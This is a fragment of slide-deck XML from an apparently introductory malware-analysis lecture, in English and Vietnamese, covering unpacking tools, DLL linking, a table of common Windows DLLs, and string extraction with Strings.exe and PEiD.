              <a:off x="5411926" y="2395031"/>
              <a:ext cx="320822" cy="321687"/>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sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="273" name="Google Shape;273;p24"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6060489" y="1907311"/>
              <a:ext cx="2161877" cy="1297126"/>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txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6098481" y="1945303"/>
              <a:ext cx="2085893" cy="1221142"/>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lang="en-GB" sz="2400">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Fix IAT</a:t>
              </a:r>
              <a:endParaRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;275;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4437112"/>
            <a:ext cx="504056" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="up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24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724554" y="5548590"/>
            <a:ext cx="17182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OllyDbg/IDA Pro</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="277" name="Google Shape;277;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3563888" y="5548590"/>
            <a:ext cx="20120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Plugin OllyDumpEx </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Google Shape;278;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317904" y="4492534"/>
            <a:ext cx="504056" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="up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 name="Google Shape;279;p24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380312" y="4461003"/>
            <a:ext cx="504056" cy="864096"/>
          </a:xfrm>
          <a:prstGeom prst="up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 name="Google Shape;280;p24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039613" y="5574729"/>
            <a:ext cx="118545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ImportREC</a:t>
            </a:r>
            <a:endParaRPr sz="18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5"/>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Linked Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="286" name="Google Shape;286;p25"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Code libraries can be linked statically, runtime, or dynamically.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Knowing how the library code is linked is critical to our understanding of malware because information that we can find in PE file header depends on how the library code has been linked.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Static linking: all code of linked library is copied to the executable.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Dynamic linking:  the host OS searches for the necessary libraries when the program is loaded.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Runtime linking:  link to the corresponding library when the function needed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-76200" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="30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6"/>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Linked Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p26"/>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GB" sz="2400"/>
              <a:t>Exploring Dynamically Linked Function with Dependency Walker</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="293" name="Google Shape;293;p26"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="35496" y="1124744"/>
            <a:ext cx="9085707" cy="569057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7"/>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Common DLLs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="Google Shape;300;p27"/>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152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="301" name="Google Shape;301;p27"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251520" y="1124745"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{614F1EC8-023B-41F6-AEA7-A8C06D0698B5}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2360625"/>
                <a:gridCol w="6352350"/>
              </a:tblGrid>
              <a:tr h="370450">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="ctr">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1600"/>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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GB" sz="1600"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr b="1" sz="16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18825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Kernel32.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> các hàm/chức năng là nhân của HĐH như truy cập và thao tác với bộ nhớ, file và phần cứng</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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18825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Advapi32.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Cung cấp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> chức năng truy cập đến nhân của HĐH (nâng cao) như quản lý dịch vụ và thanh ghi</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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18825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>User32.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> các giao diện người dùng như button, thanh cuộn, các tương tác với người dùng</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Gdi32.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Chứa</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> các hàm hiển thị và xử lý đồ họa</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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446725">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Ntdll.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>DLL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> này cho phép giao tiếp với nhân của HĐH.  Thường các file thực thi không import trực tiếp thư viện này mà thực hiện gián tiếp thông qua </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Kernell32.dll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr/>
                    </a:p>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t>Nếu một c.trình import DLL này thì c.trình đó muốn sử dụng các chức năng không  cho phép  dùng của Windows như giấu file, hoặc xử lý các tác vụ (process)</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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65925">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>WSock32.dll /Ws2_32.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Đây</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> là các thư viện liên quan đến chức năng mạng. Một chương trình sử dụng nó có khả năng sẽ tạo kết nối mạng hoặc thực hiện các tác vụ liên quan.</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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18825">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr i="1" lang="en-GB" sz="1600"/>
                        <a:t>Wininet.dll</a:t>
                      </a:r>
                      <a:endParaRPr i="1" sz="16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GB" sz="1600"/>
                        <a:t>Thư</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600"/>
                        <a:t> viện này chứa các chức năng mạng bậc cao để triển khai các giao thức như FTP, HTTP, NTP.</a:t>
                      </a:r>
                      <a:endParaRPr sz="16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8"/>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Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="Google Shape;308;p28"/>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A program contains strings if it:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Print a message</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Connects to a URL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Copies file to a specific location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strings (often in ASCII or Unicode) reveals functionalities of a program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-107950" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="560"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="28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9"/>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Strings</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="Google Shape;315;p29"/>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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>ASCII</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Unicode</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-121284" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-285750" lvl="1" marL="742950" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="518"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Tool</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Strings.exe</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="444"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="316" name="Google Shape;316;p29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403648" y="1073230"/>
            <a:ext cx="6984776" cy="1563682"/>
            <a:chOff x="1403648" y="1649294"/>
            <a:chExt cx="6984776" cy="1563682"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="317" name="Google Shape;317;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1403648" y="2492896"/>
              <a:ext cx="1296144" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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4C</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="318" name="Google Shape;318;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2728748" y="2492896"/>
              <a:ext cx="1296144" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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4F</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="319" name="Google Shape;319;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4024892" y="2492896"/>
              <a:ext cx="1296144" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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56</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="320" name="Google Shape;320;p29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5321036" y="2492896"/>
              <a:ext cx="1296144" cy="720080"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D8D8D8"/>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45</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
